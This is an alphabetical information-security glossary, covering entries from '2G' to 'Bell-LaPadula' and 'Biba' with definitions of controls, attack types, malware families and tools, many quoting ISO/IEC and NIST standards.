Information Security Hyper-glossary


This hyperlinked glossary defines over 2,000 terms used in information risk,
information security, cybersecurity, governance, compliance, privacy,
business continuity and related areas.

Click any underlined word to explore its definition.





See zero-day.


See triple-DES.

2G, 3G, 3½G, 4G, 5G …

Second and successive generations of the digital network used by devices such as cellphones/smartphones and USB modem sticks for voice calls, SMS/TXT messaging and data communications including mobile Internet access.  Defined by the ITU under the International Mobile Telecommunications-2000 (IMT-2000) and successive standards.  The 5G standards were introduced in 2017 with networks and consumer devices on the way.


Section number of the Nigerian penal code criminalizing advance fee frauds.  Often refers to other social engineering scams as well, hence email scammers are known colloquially as “419ers”.

(Authentication, Authorisation and Accounting)

The main IT security controls associated with the logon process i.eauthentication to verify the user’s claimed identity, authorisation or allocation of the user’s defined access rights and permissions, and logging key details concerning the user’s login and subsequent activities for accountability purposes.  See also I&A.

(Attribute Based Access Control)

“An access control method where subject requests to perform operations on objects are granted or denied based on assigned attributes of the subject, assigned attributes of the object, environment conditions, and a set of policies that are specified in terms of those attributes and conditions” (NIST SP800-162).

(Attribute-Based Unlinkable Entity Authentication)

A means for people to authenticate themselves anonymously, without revealing so much personal information that their identity can be ‘linked’ (inferred or determined), compromising their privacy.  See ISO/IEC 27551.


The ability of a person, computer program etc. to enter, interact with, use or misuse a controlled resource such as information, a site, building, facility, room, system, network, database, file, filing cabinet, directory, disk or other device.

Access authority

Organisation, department, person, system, program or function that determines whether to grant or deny access to controlled information assets such as personal information.  See also reference monitor.

Access card, proximity card,
pass card, access badge,
staff pass, ID card,
RFID (Radio Frequency IDentification) tag etc.

Authentication device that (normally) communicates wirelessly with a card reader (normally) located at an access controlled door or gate to determine whether the expected card holder is authorized to proceed.  Vulnerable to being lost, stolen or handed to someone else, and perhaps cloned or hacked.  Often carries the authorized holder’s photograph as well, giving alert and diligent security guards, receptionists and other workers the chance to determine at a glance whether the person presenting, wearing or using the card resembles the mugshot (assuming they have not simply replaced the photo or faked the entire pass!).

Access control

Security control intended to govern access to an asset, permitting authorized and appropriate access whilst preventing unauthorized or inappropriate access.  May be physical (such as a lock), electronic/digital (such as encryption), or procedural (such as a nightclub bouncer checking the VIP guest list for the name on your photo-ID).  Often critically important, implying the need for strong assurance that it is correctly designed, implemented, configured, operating, managed and controlled.  “Means to ensure that access to assets is authorized and restricted based on business and security requirements” (ISO/IEC 27000).

Access gateway

“A gateway that provides the system user access to multiple security domains from a single device, typically a workstation” (NZ information security manual).

Access matrix

Table relating users or their rôles (on one axis) to the IT systems, application functions and/or classes of data (on the other axis), showing the types of access permitted and/or denied (within the body of the table).

Access Point
wireless access point

Network router providing Wi-Fi services, generally on a wired LAN.  “A device that logically connects wireless client devices operating in infrastructure to one another and provides access to a distribution system, if connected, which is typically an organisation’s enterprise wired network” (NIST SP 800-48 and SP 800-121).  “Device or piece of equipment that allows wireless devices to connect to a wired network. Note: The connection uses a wireless local area network (WLAN) or related standard.” (ISO/IEC 27033-6).

Access policy,
access control policy

Security policy or a set of defined rules determining authorized and controlled access to information assets such as functions, tables or records in a database, or programs, files and directories on an IT system, or IT systems on a network, or locations (sites, buildings, rooms, cabinets etc.) holding such assets.  Typically used to configure appropriate access rights (for example read, write, delete and/or control) for user rôles which are then assigned to individual users authorized to perform those rôles (see RBAC).

Access right,
logical access right,
access permission

Individual people, systems, programs, organisations etc. may be granted or denied access to controlled resources such as data, transactions/functions or physical locations according to whether the access is authorized i.e. their logical access rights, permissions or attributes match the access rules or criteria associated with those resources according to the access policy.  May be documented in the form of an access matrix or permit.  See also right.


While information security incidents may result from deliberate acts by hackers, malware, fraudsters, spies etc., the greater proportion by number are in fact the result of inadvertent or unintentional acts, natural or chance events, or errors.  Physical accidents and health-and-safety failures that befall workers constitute information security incidents since people are information assets.

Accommodation address

Mail drop used for convenience and sometimes to conceal the true location/identity of a fraudster by giving the appearance of belonging to a legitimate business or an innocuous member of the general public.

Account hijack,
account takeover

Taking unauthorized control of a target’s bank, credit card, email, IT system or telephone account by means of hacking, social engineering, malware etc., typically as part of identity fraud or some other attack.

held to account

Someone (a person or organisation) who is held accountable for something (such as a privacy breach or some other incident) may be sanctioned in some way (‘held to account’) by an authority if they do not fulfil their obligations.  Sanctions may include penalties, disciplinary action, dismissal, prosecution, withdrawal of privileges etc.  In contrast to responsibility, accountability is a sticky property that cannot be unilaterally delegated or passed by the accountable person or organisation to another, in other words the buck stops here“Required or expected to justify actions or decisions; being answerable and responsible” (NZ information security manual).


Whereas normally the term implies financial accounting, the underlying principles and practices of systematically, formally and thoroughly recording and cross-checking various details such that relevant parties can be held to account for their activities are more widely applicable.  Most IT systems, for instance, can automatically record information about user logons, use of privileges and overrides, alerts, alarms and other potentially significant events in their log or accounting files, with utilities to search and report on them, even if these days they are no longer required to re-charge users for their use of the computers (common practice prior to the 1990s).


The process of checking that an organisation or individual is competent to check and certify others, to a level specified by some trusted authority.  Often confused with certification, the process of issuing certificates.  “A procedure by which an authoritative body gives formal recognition, approval and acceptance of the associated residual security risk with the operation of a system and issues a formal approval to operate the system” (NZ information security manual).


Precise, truthful and valid, faithfully representing factual reality.  An integrity property.

(Access Control List)

Security metadata associated with a computer file, directory, disk, port etc. specifying, for example, which users may or may not access or change the object’s security settings, and whether successful and/or unsuccessful attempts to do so are logged.  ACL capabilities vary between operating systems.


“Stakeholder that procures a product or service from another party.  Note: Procurement may or may not involve the exchange of monetary funds.” (ISO/IEC 27036-1).


Initial phase or activity in the process of gathering, analysing and presenting forensic evidence, or procuring a product.  “Process of creating a copy of data within a defined set.  Note: The product of an acquisition is a potential digital evidence copy.” (ISO/IEC 27037).  “Process for obtaining a product or service” (ISO/IEC 27036-1).

Active Directory
Federation Services

Proprietary Microsoft technology blending LDAP (Lightweight Directory Access Protocol) with SAML for identification and authentication, authorisation and access control purposes.

Active shooter,
active killer

Suicidal terrorist or brutally unhinged nutcase, often armed, who indiscriminately and violently attacks innocent people with intent to injure or kill as many as possible before being arrested, disabled or killed.  An extreme safety threat to everyone in the vicinity.


Microsoft technology for interactive web pages.  Malicious ActiveX controls (a form of malware) may potentially compromise the userssystems: if the browser security settings allow, even unauthenticated (‘unsigned’) ActiveX controls may access files on the user’s hard drive for example.  Microsoft dropped Active X support from its browsers in 2016.


Relatively mild extremist.


A professional (typically employed by insurance companies) who uses probability theory and mathematical techniques to analyse data and so quantify and hence manage risk with scientific rigor.


Hacking/penetration testing tool.

Ad injection

Browser malware that displays advertisements and (in some cases) steals personal information from infected systems.  See also adware, XSS and HTML injection.

Administrative account

See privileged user.  “A user account with full privileges on a computer.  Such an account is intended to be used only when performing personal computer (PC) management tasks, such as installing updates and application software, managing user accounts, and modifying operating system (OS) and application settings” (NIST SP800-114 rev1).

Administrative control

See manual control and management control.  ADCON is a US Navy abbreviation.


Forensic evidence must be trustworthy if it is to be presented in court.  Evidence that is dubious for some reason (e.g. if there is reasonable doubt that it was in fact properly collected, stored and analysed in full accordance with applicable laws, regulations and standards of good forensic practice) may be ruled inadmissible by the judge and hence cannot be used to support or refute a case.

Advance fee fraud

Type of fraud in which the fraudster fools a naïve and vulnerable victim into sending money as ‘advance fees’ supposedly in order to secure a substantial payout (such as an inheritance or lottery win) or other benefit (such as an immigration visa) which, strangely enough, gets tantalizingly close but never quite materializes.  Commonly known as a 419 scam.  Originally perpetrated by letter, Telex and FAX but latterly more often by email, SMS/TXT, social media etc.  Commonplace form of social engineering.


An enemy of the organisation such as a malicious person, group or organisation.  May be a worker, fraudster, hacker, competitor, pressure group, government or terrorist, who is willing to attack and harm the organisation in some way (not necessarily physically) e.gVXers, insider threats, lobbyists, rumour-mongers, saboteurs and cyberteurs.  A threat agent.


Annoying software that displays advertisements etc.  Considered by some to be malware since it is often covert, seldom knowingly authorized, consumes resources and may have undesirable side-effects.  See also ad injection“Application which pushes advertising to users and/or gathers user online behavior.  NOTE The application may or may not be installed with the user’s knowledge or consent or forced onto the user via licensing terms for other software.” (ISO/IEC 27032).

Adwind, AlienSpy, Frutas, Unrecom, Sockrat, JSocket, jRat

Heavily obfuscated species of RAT malware available to rent on the black market (MaaS).  Built using Java so it can run on Windows, Linux, Android, MacOS and other systems with Java capabilities.  Frutas was first discovered in 2012 and variants were still in the wild as of 2018.

(Advanced Encryption Standard)

‘Military grade’ cryptographic algorithm chosen by NIST in 2001 to replace DES and specified in the standard FIPS 197.  A symmetric block cipher generally understood to be strong, but widespread distrust of the NSA following Ed Snowden’s revelations casts doubt on that assertion.

Affirmative cyber risk

Cyber incidents explicitly covered in cyberinsurance or other forms of insuranceCf. non-affirmative cyber risk.


(a) Person who somehow (usually covertly) obtains legitimate access to confidential proprietary or personal information but betrays their position of trust by disclosing or permitting access to the information by an unauthorized third party (sometimes unwittingly), typically through a collector.  See also spy.  (b) A benign or malicious program, person or organisation acting on behalf of another, for example gathering and passing-on data from one system or network for collation and analysis centrally in conjunction with data fed by agents running on other systems or networks.

Agent provocateur

French term literally translated as ‘agent who provokes’, meaning a secret agent who infiltrates an organisation and incites them to act illegally in such a way that they are likely to be caught in the act.  A cyberteur.


Joint commitment of two or more parties to a shared objective.  “Mutual acknowledgement of terms and conditions under which a working relationship is conducted” (ISO/IEC 27036-1).


The collection of information from disparate sources, for example to profile a target.  Due to explicit and/or inferred relationships between items of information, aggregation and subsequent analysis can generate new knowledge, hence databases are usually more valuable than the unorganised data items they contain: the whole is greater than the sum of the parts.

Aircrack ng

Wi-Fi network hacking and penetration testing tool, capable of cracking WEP,  WPA and WPA2/PSK.

Air gap

Complete physical and logical separation between entities, for example isolating highly-secure networks from less-secure ones by prohibiting any connections between them.  Tends to fail-insecure, in other words if the air-gap is somehow breached, the destination tends to be highly vulnerable if excessive trust (faith) or reliance was placed on the air-gap.

Air lock, air-lock, airlock

See man trap.


Audio/visual warning of the occurrence of a critical security and/or safety condition (e.gfire/smoke, intruder, flood, gross system integrity failure) or incident requiring an urgent, high-priority response.  See also alert.


(a) Warning that a critical system security event (e.gaudit or security log file full, system shutdown initiated, user authentication failure) has occurred.  While definitions vary, alerts generally signal important but not necessarily critical conditions requiring less urgent responses than alarms.  They are usually logged for analysis and follow-up action if and when convenient.  (b) A state of awareness, vigilance and preparedness to react appropriately to events and incidents“’Instant’ indication that an information system and network may be under attack, or in danger because of accident, failure or human error” (ISO/IEC 27033-1).


Mathematical function, process and/or protocol at the heart of a cryptosystem.  Determines the specific sequence of actions or operations necessary, for example, to encrypt the plaintext and decrypt the cyphertext, or to calculate and verify a hash.

Allocated space

“Area on digital media, including primary memory, which is in use for the storage of data, including metadata” (ISO/IEC 27037).

Amplification attack,
reflection attack

Type of attack in which network servers are tricked into transmitting a large volume of traffic to a target system, potentially overloading it and causing Denial of Service.  NTP, DNS or other request packets with spoofed source IP addresses matching the target are sent to one or more network servers which then forward their responses to the target instead of the originator.  See also DRDoS.

(Active Management Technology)

Intel incorporate hardware subsystems into some of their CPU chips to facilitate low-level system management.  In May 2017, Intel disclosed a design flaw in AMT that creates a severe vulnerability allowing hackers to gain privileged access to systems using the “Q series” chipset, either locally or through the network.  The wisdom of allowing low-level privileged system management in this way, through hardware that bypasses normal BIOS and operating system security (a backdoor), is in question.


The process of systematically analysing (exploring, investigating or evaluating) something (such as risks, incidents or forensic evidence) in depth.  “Process of evaluating potential digital evidence in order to assess its relevance to the investigation.  Note: Potential digital evidence, which is determined to be relevant, becomes digital evidence.” (ISO/IEC 27042).

Analytical model

Mathematical formula for generating metrics (such as a positive trend in a relevant security parameter) from measurements (normally a time series of values of the parameter), giving meaning to the numbers (“See, things are improving!”).  “Algorithm or calculation combining one or more base measures and/or derived measures with associated decision criteria” (ISO/IEC 27000).


For ideological or other reasons, anarchists typically seek to overthrow the government and disrupt organised society by (among other things) sabotaging vulnerable parts of the critical [national] infrastructure.


A crimeware kit, in the wild in 2016.

Angry IP Scanner,

Network administration/security/penetration testing tool vaguely similar to nmap.  It scans (queries) IP address and port ranges to identify network nodes.


Something different, unusual, unexpected or out of the ordinary.  While large data anomalies (such as numerous data values completely missing for a significant period) may be easily spotted by eye (provided someone is actually looking!), small anomalies in large data sets or databases can be identified much more easily and reliably by systematic statistical analysis e.g. applying Benford’s law.  Such anomalies are inherently interesting, hinting at the possibility of unexpected relationships, biases or events, perhaps even information security incidents such as bugs, flaws, frauds, malware or hacks in progress.


A person’s ability or right to go about their life and business while withholding their identity, for example whistleblowing  or for privacy  reasons.  Typically achieved through discretion, sometimes through a trusted third party using techniques such as anonymisation, tokenisation or redaction.


The redaction of information needed to identify specific individuals in a database, document etc. for example by tokenisation, usually for privacy reasons.


(a) Information that is not and cannot be linked unambiguously to a specific, identifiable originator or source.  (b) The name of a “hacker collective”, a loosely-organised and indistinct group or movement of pranksters, hackers, digital vigilantes and subversive hacktivists active since 2004.  Their proclamations famously include the line “We are legion” spoken in a synthetic voice emanating from a stylized mask.  See also LulzSec.


Physical security access control arrangement such as a man trap designed to prevent someone presenting their access card to open a one-person-at-a-time controlled entrance for themselves, then handing their card back to someone else (typically an unauthorized visitor) permitting them also to access the controlled area.  Electronic access control systems may keep track of people, preventing them from re-accessing an area unless they have previously exited it, requiring them to present their access cards at both entry and exit points.  “A security mechanism preventing an access card or similar device from being used to enter an area a second time without first leaving it (so that the card cannot be passed back to a second person who wants to enter).” (PCI Card Production and Provisioning Physical Security Requirements, v2.0 January 2017).

Antivirus [software, app, program, package]

Software designed to minimize the risk of malware by detecting, preventing and/or removing infections with viruses, network worms, Trojans, spyware, ransomware, rootkits etc.

(Access Point Name)

A gateway linking a mobile network to the Internet or another network.  Malware may surreptitiously alter the APN on mobile devices, redirecting users to access points monitored and controlled by hackers.


Computer system or device dedicated to a specific purpose, ready to use straight out of the box, requiring little if any configuration or management.  Consumer networking equipment such as broadband modems and access points are usually appliances, as are some commercial firewalls.  Usually built around an embedded system.  Some whiteware (household appliances) are smart.

App, application

Computer program or suite of programs providing a useful function.  Apps on smartphones, tablet and portable PCs, particularly free social media or security apps downloaded from the Web and installed by naïve users, may be Trojans, spyware, network worms or other malware, especially on jailbroken devices.

Application development, software development,
systems development

The process, method, approach, phase or stage within which new or updated software is coded (created).  Sometimes taken to include the earlier specification, architecture and design phases, and perhaps the software testing, version control, change and configuration management, and implementation activities that normally follow development.

Application services

“Software with functionality delivered on-demand to subscribers through an online model which includes web based or client-server applications” (ISO/IEC 27032).

Application whitelist

The application of whitelisting to apps. “An approach in which all executables and applications are prevented from executing by default, with an explicitly defined set of allowed executables” (NZ information security manual).

(Advanced Persistent Threat)

A highly sophisticated, sustained and ultimately damaging attack, or a series of attacks, by a very resourceful, determined and capable adversary.  Generally involves a combination of methods and tools, such as custom malware, social engineering, hacking (including hacked hardware, software or firmware, including things) and/or physical intrusion.

(Analog Risk Assessment),
(Probability Impact Graph)

Visual security metric analysing information risks in two dimensions according to their relative likelihood or probability of occurrence (on one axis) and (on the other axis) their relative severity or potential impacts on the organisation if they were to occur.  Risks that are both relatively likely and severe, or those that are heading in that direction, are generally of greater concern than the remainder and may be displayed in red or on a red background to catch the readers’ attention.


Overall grand design or blueprint for an organisation’s information systems and business processes, linking even higher level objectives from various strategies to lower-level designs for individual systems and processes.  May incorporate the information security architecture.  In the physical security context, the architectural design of a facility can enhance or hinder its security.  “Fundamental organisation of a system embodied in its components, their relationships to each other, and to the environment, and the principles guiding its design and evolution” (ISO/IEC 15288:2008, cited by ISO/IEC 27033-1).


Secure long-term storage of valuable information, designed to ensure its integrity, availability and often (but not necessarily) its confidentiality and so maintain its value.  May be required for compliance reasons e.gorganisations are obliged by applicable laws and regulations to provide certain types of business record several years after they were created.  In a few cases, the retention period is indefinite.


Strong protective plates, typically comprising layers of leather, steel, Kevlar/carbon-fibre/composite materials and ceramics that absorb and spread the energy, resisting penetration by weapons such as swords, daggers/knives, shrapnel and bullets.  The physical security version of hardening.


Deliberately setting fire to or burning something without its owner’s permission, or with intent to defraud another (such as an insurance company).  A form of sabotage.  A threat to many tangible assets.

(Address Space Layout Randomisation)

Security technique that randomizes memory addressing for processes, function calls etc., frustrating hacking attempts to invoke or replace privileged functions occupying fixed and hence predictable addresses through buffer overflows and similar exploits.  See also KASLR.

ASP (Application Service Provider)

“Operator who provides a hosted software solution that provides application services which includes web based or client-server delivery models.  EXAMPLE Online game operators, office application providers and online storage providers.” (ISO/IEC 27032).


Unilaterally state or claim something to be true, without necessarily having or providing the evidence to prove it.


Dominant, coercive, overbearing or authoritarian, able to exert strong influence on another without resorting to overt aggression or violence.  A powerful technique in many social engineering attacks as well as legitimate controlling activities (“Hands up!  You’re nicked!” for instance).


Something of value to its owner whereas if it has little, no or even negative value to its owner, or is more valuable to another, it may be a liability.  May be tangible (e.g. a building, hardware, signed/executed contract or license/approval, person, cash, IOU, padlock), intangible (e.gknowledge, experience, know-how, skill, capability, competence, tradecraft, information, software, creative idea, concept, relationship, virtual organisation, brand, reputation, trust, loyalty, goodwill, bank credit, application or service, right or permission, understanding, verbal contract, obligation) or indeterminate sharing both tangible and intangible characteristics (e.gtrademark, patent, firmware, data, database, system, security).  See also information asset“Anything of value to an agency, such as IT equipment and software, information, personnel, documentation, reputation and public confidence” (NZ information security manual).  “Legal right or organisational resource which is controllable by an entity and has the capacity to generate economic benefits” (ISO 10668).  “Anything that has value to an individual, an organisation or a government” (ISO/IEC 27032).


The provision of a certain level of trust, confidence, confirmation or proof of something, typically by reviewing, checking, testing, certified compliance or auditing it.  A security-assured program, for example, has been tested to confirm that it fulfils information security requirements.


Type of cryptosystem that uses pairs of mathematically related but quite different public and private keys to either encrypt or decrypt.  Although the pairs of keys are related and are fairly simple to generate (on a computer at least), it is infeasible to guess or calculate either key from the other without additional informationCf. symmetric.


Code injection exploit that alters the atom tables used internally by Windows to store and communicate strings during program execution.

(Adversarial Tactics, Techniques, & Common Knowledge)

MITRE’s knowledgebase of cyber-attack tactics and techniques, first published in 2015.  See


Type of information security incident actively and deliberately perpetrated by someone (the attacker or adversary) on one or more victims (people and/or organisations) without their permissionCf. accident or act of god.  “Attempt to destroy, expose, alter, disable, steal or gain unauthorized access to or make unauthorized use of an asset” (ISO/IEC 27000).


Person, group or organisation actively mounting one or more attacks“Person deliberately exploiting vulnerabilities in technical and non-technical security controls in order to steal or compromise information systems and networks, or to compromise availability to legitimate users of information system and network resources” (ISO/IEC 27033-1).

Attack surface

A notional 3-dimensional representation of the organisation’s information assets, risks etc. where the height axis in some way reflects vulnerabilities and/or their exposure by various parts of the organisation, forming a complex and dynamic ‘surface’ that might be actively attacked or exploited by hackers, malware etc. to the corresponding extent.  Implies that improving the protection of information assets and/or reducing the exposure or extent of vulnerabilities will somehow improve the organisation’s information security … without specifying precisely how.  A security metric.  See also security landscape, risk universe, risk profile and heatmap“The amount of IT equipment and software used in a system.  The greater the attack surface the greater the chances are of an attacker finding an exploitable vulnerability” (NZ information security manual).

Attack toolkit

See crimeware.


The use of QRcodes, perhaps stuck over legitimate QRcodes, containing malicious JavaScript or URLs linking to infectious or phishing websites.  Exploits our inability to interpret them simply by eye.


Formally documented assertion by a duly authorized and accountable person that the organisation complies with (fulfils the requirements of) particular laws, regulations or professional practices (such as relevant governance, accounting and audit standards).  Although highly stylized and very precisely worded to exclude other liabilities, the signatories are personally accountable for the veracity of such statements, hence attestation carries a lot of weight and is taken very seriously.  A surprisingly powerful administrative control, akin to taking an oath.



Characteristic.  “Property or characteristic of an object that can be distinguished quantitatively or qualitatively by human or automated means” (ISO/IEC 27000).


(a) Acknowledgement referencing the source, originator and/or owner of intellectual property being reproduced elsewhere in order to thank them and (hopefully) reduce the risk of being accused of plagiarism or copyright abuse.  [Note: strictly speaking, attribution is irrelevant to copyright infringement but it is ethical and polite to acknowledge one’s sources.]  (b) Cybersecurity incidents are often blamed on (attributed to) certain perpetrators according to someone’s evaluation of evidence in the malware or hacking tools used, or other clues such as the demands and claims made.  However, perpetrators of illegal acts are (for obvious reasons) keen to remain undercover and may deliberately mislead the analysts by seeding false leads.  Furthermore, attacks often involve a blend of code, tools and techniques from disparate sources, obtained through the hacking underground scene and used or adapted for the specific purpose at hand.


Structured assurance process of examination, review, assessment, testing and reporting by one or more competent and trusted people who – crucially – are independent of the subject area being audited.  In many organisations, ‘audit’ also refers to the business department or function (usually “Internal Audit”, “Quality Audit” etc.) and/or third party organisation (more formally “External Audit”) responsible for auditing.  Derived from the Latin audio (to listen).  “Systematic, independent and documented process for obtaining audit evidence and evaluating it objectively to determine the extent to which the audit criteria are fulfilled.  Notes: an audit can be an internal audit (first party) or an external audit (second party or third party), and it can be a combined audit (combining two or more disciplines); ‘audit evidence’ and ‘audit criteria’ are defined in ISO 19011” (ISO/IEC 27000).  “An independent review of event logs and related activities performed to determine the adequacy of current security measures, to identify the degree of conformance with established policy or to develop recommendations for improvements to the security measures currently applied” (NZ information Security Manual).


An assurance objective for many important IT systems, processes, business relationships etc. meaning that they are capable of being audited.  Implies the need to retain high integrity records of relevant events and activities (e.g. secure logs) that can be independently reviewed if and when required.

Audit logging

“Recording of data on information security events for the purpose of review and analysis, and ongoing monitoring” (ISO/IEC 27033-1).

Audit scope

Coverage of an audit“Extent and boundaries of an audit (ISO 19011:2011).

Audit tools

“Automated tools to aid the analysis of the contents of audit logs” (ISO/IEC 27033-1).

Audit trail

Chronological record of important transactions or stages in a business or ICT process, which may be used to reconstruct the exact sequence of events.  An IT system security log, for example, is typically configured to record details such as successful and failed system logons, security alarms and alerts etc. with timestamps.

(Acceptable Use Policy)

Semi-formal policy or guideline laying out and contrasting acceptable against unacceptable use of information, ICT services, systems etc. in plain English.


Control process by which a specific individual user, system, message, block of data etc. is positively identified and confirmed authentic, typically on the basis of something they know (e.g. a password) and sometimes something they have (credentials), something they are (meaning biometrics) and/or where they are (their virtual/network or physical location).  Usually involves cryptography.  Authentication is a critically important and hence inherently risky control: if the process fails, is bypassed, undermined, spoofed or disabled, many other security controls (such as access controls, audit trails, logging and alerting) are also rendered ineffective, often with no indication of anything amiss.  “Provision of assurance that a claimed characteristic of an entity is correct” (ISO/IEC 27000).


Verifiably genuine, not counterfeit or fake“Property that an entity is what it claims to be” (ISO/IEC 27000).


Person, rôle, organisation etc. of high status or seniority (such as a manager, regulator, government agency, tribal elder or significant other) or a stakeholder that commands respect, compliance and/or obedience, thus exerting influence or control over subordinates.


Permitted, accepted and/or agreed by management or some other authority as being in the best interests of the organisation, the workforce, the stakeholders or society at large.  Cf. unauthorized.


Some network servers advertise their services (such as multimedia or printing) by routinely broadcasting network messages, allowing them to be ‘discovered’ by other network systems

Automated control

Control embedded in an electronic or mechanical system capable of operating automatically without necessarily involving a person in order to function.  Cf. manual control.

Autonomous weapon

A ‘fire-and-forget’ cyberweapon capable of acting autonomously or semi-autonomously using smarts (artificial intelligence) to complete complex reconnaissance, surveillance and/or combat missions with little if any direct involvement and real-time control by human operators, in contrast to remote-controlled or dumb weapons.  May be a physical device or malware.


Software tool (malware) that gives hackers or script kiddies fully privileged access to vulnerable systems.


One of the three core objectives of information security, along with confidentiality and integrity (the CIA triad).  Availability concerns the requirement for information, IT systems, people and processes to be operational and accessible when needed, implying the use of resilience and/or recovery controls to guard against unacceptable disruption or interruption of necessary services.  “Property of being accessible and usable upon demand by an authorized entity” (ISO/IEC 27000).


A global criminal botnet infrastructure used for phishing, malware distribution and money mule recruitment.


General appreciation by workers of their rôle in the process of securing the organisation’s information assets, for instance through compliance with policies, laws and other security obligations and responsibilities.  Being vigilant for, and responding appropriately to, information security threats, vulnerabilities, near misses, events and incidents is an extremely important form of control.  See also education, training and security culture.


A fundamental information security policy requirement, architectural principle or rule.  Axioms may be derived from first principles, and/or from sources such as the control objectives defined in ISO/IEC 27002 to justify and underpin the organisation’s information security policy statements, standards, procedures, guidelines and controls.


Malware species used by the Kimsuky hacker group.  Written in Visual Basic Script.

Back channel

See covert channel.


Cryptic control bypass function in a program allowing users to access the system without proper authorisation.  Sometimes coded in for legitimate software development, testing or support purposes (e.g. ‘cheat codes’ used to bypass the early stages in an electronic game or make a game character invincible, immune to attacks), occasionally for dubious, unethical, nefarious or malicious purposes (e.ghacking, coercion, embezzlement, fraud, espionage or covert license compliance checks, or introduced by malware).

Background check

Pre-employment screening process that evaluates a new starter’s social and family background, identity, employment record, immigration status, criminal record, credit status etc. to identify security and trustworthiness issues.  A service often provided by specialist suppliers.  The nature, extent and thoroughness of the checks varies widely in practice due to legal and time constraints, privacy concerns, policy, costs and practicalities, the particular rôle etc.  See also security clearance and positive vetting.


Snapshot copy of data, programs, configurations etc. from an IT system at a given point in time.  Backups provide the ability to restore a system to a known state after an incident (such as a ransomware infection) but are generally not intended to last as long as archivesIntegrity and availability are critical concerns for backups, plus confidentiality if the information content is sensitive, hence backups must be risk-assessed and secured, normally by means of documented policies and procedures, redundancy, firesafes, off-line and off-site storage, encryption, testing to prove recoverability, oversight/monitoring etc.


One of several species of ransomware in the wild that surreptitiously encrypts victimsdata, coercing them into paying a ransom for the decryption keys

Badge access

See access card.


Courtyard in a Mediaeval castle.


Social engineering method of [figuratively] dangling something attractive in front of victims, such as a 419 or phishing email, what appears to be a dropped/lost USB stick, or an advertisement, web page etc., typically containing malware.


Ancient social engineering trick in which a victim is enticed to purchase an attractive display item that is then surreptitiously substituted by an item of much lesser value.

Balancing control

Control that involves reconciling complementary (equal and opposite) values, as in double-entry bookkeeping etc.

Bank Trojan,
banking Trojan,
online banking Trojan,
banker Trojan

Trojan (such as Zeus) that captures user authentication credentials (typically by keylogging) or hijacks web sessions (usually via man-in-the-middle attacks) to steal funds from online bank accounts.

Barbed wire

Fencing wire with sharp barbs evenly spaced every few inches to snag the clothing and prick the skin of any intruders foolish enough to climb over.  A physical security control with some deterrent effect, though less extreme than razor wire or spikes.

Bare metal

Refers to the tangible computer hardware platform on which host operating systems, including hypervisors, run, as distinct from the virtual (simulated) hardware on which guest systems run in a virtual system.

Base measure

Measure defined in terms of an attribute and the method for quantifying it.  Note: a base measure is functionally independent of other measures” (ISO/IEC 15939:2007).

Baseline security

The lowest permissible/acceptable level or form of security in a given situation (such as a particular organisation, physical security zone or data classification level, or a genuine security culture).  Forms a sound platform, basis or foundation on which additional security can be implemented where appropriate.  May be documented in a baseline security standard.  [Baseline:] “Information and controls that are used as a minimum implementation or starting point to provide a consistent minimum standard of systems security and information assurance” (NZ information Security Manual).

Baseline security standard

Corporate information security standard defining the ‘lowest common denominator’ controls i.e. the minimal information security control requirements that are expected to be met or exceeded in all circumstances unless formally declared exempt.

Base station,
wireless base station

“Equipment that provides the connection between mobile or cellular phones and the core communication network” (ISO/IEC 27033-6).


See shellshock.

Basic collection

CIA term for OSINT including information ‘voluntarily disclosed’ by individuals.  It is not clear what techniques are or are not permitted to ‘encourage’ individuals to ‘volunteer’ information, but at least the CIA acknowledges their use of both standard collection and special collection.

Battery backup

Electronic devices require electricity to operate normally, making them dependent on the power supply and vulnerable to power interruptions.  For devices that are at all important, power interruptions constitute a substantial risk, hence batteries are an important form of control to maintain services as long as necessary to restore the primary or standby supply.  Unfortunately, batteries bring their own risks (such as finite capacities and lifetimes, leakage of corrosive chemicals, and explosions) which must also be addressed.  See also UPS.


High walkway topping Medieval castle walls, usually crenelated, from which defenders could fire arrows, spears, stones and pour boiling oil on attackers below.


Heuristic technique based on probability theory, originally developed by Thomas Bayes, sometimes used to identify potential information security events (such as spam and malware).

Bell-LaPadula model

Formal model or architecture developed by David Elliott Bell and Leonard J. LaPadula in 1973 applies strict (mandatory) access control rules (usually expressed as ‘no read up, no write down’ – the converse of the Biba model) and other constraints (such as the tranquillity principle) to maintain data confidentiality.  Subjects (generally programs or systems) can neither read objects (generally data) at a higher level of classification nor write to or share data with objects or subjects at lower classification levels in the hierarchy.

(Business Email Compromise), EAC
(Email Account Compromise),
“bogus boss”,
“bogus invoice”,
MITE (Man-In-The-Email)

Extremely lucrative type of social engineering attack involving misuse or falsification of email addresses, accounts or systems (e.g. through hacking, spyware or simply faking email sender addresses) to scam or defraud victims.  There are many variants, for example masquerading as a manager or supplying a false invoice in order to trick an accounts clerk to change the payee’s bank account, diverting funds into the fraudster’s money laundering mechanisms.  See also VEC.

Benford’s law

Physicist Frank Benford realized that the digits in a set of numbers (such as the values of corporate expense claims) tend to be unevenly distributed, high value digits such as 9 normally occurring less often than low ones such as 1, especially for the most significant (leftmost) digits.  Statistical analyses and tools use Benford’s law to identify data subsets with anomalous distributions, such as expense claims by a particular worker that might have been systematically and fraudulently manipulated or falsified.  One of several techniques for identifying patterns, correlations, anomalies and exceptions in databases according to the nature and distribution of the data (metadata).


Harmless or helpful, having beneficial or negligible/neutral intent or consequences.  Cf. malicious.

Best Current Practice

Internet Engineering Task Force’s description of a de facto level of performance, security etc.  Serially-numbered and occasionally updated BCPs are used to document evolving or dynamically changing practices for which static standards are impracticable or inappropriate.  Cf. Business Continuity Plan.

Best evidence

The forensic evidence originally gathered or seized from the scene of a crime and destined to be presented in court (e.g. the defendant’s computer) rather than forensic copies made for forensic investigation purposes (e.gbit-copies of the computer hard drive).  Evidence is considered ‘best’ if there is none better.  Although forensic copies may sometimes be presented in court for various reasons (e.g. if the best evidence has unfortunately gone missing or degraded in storage), they carry slightly less weight than the best evidence.

Best practice

By convention or common agreement, the ultimate approach.  However, since security controls are often highly context-dependent, so-called best practices may be inappropriate, inadequate or even detrimental in any given situation, hence good practice is the better term.

(Browser Helper Object)

Program that loads and runs automatically when Internet Explorer is launched.  Some BHOs are malicious i.emalware.

Biba model

Formal model or architecture developed by Kenneth J. Biba in 1975 applies strict (mandatory) access control rules (usually expressed as ‘no read down, no write up’ – the converse of the Bell–LaPadula model) to maintain data integrity.  Subjects (generally programs or systems) can neither corrupt higher-level objects (generally data) nor be corrupted by lower-level objects or subjects in the hierarchy.

Big data

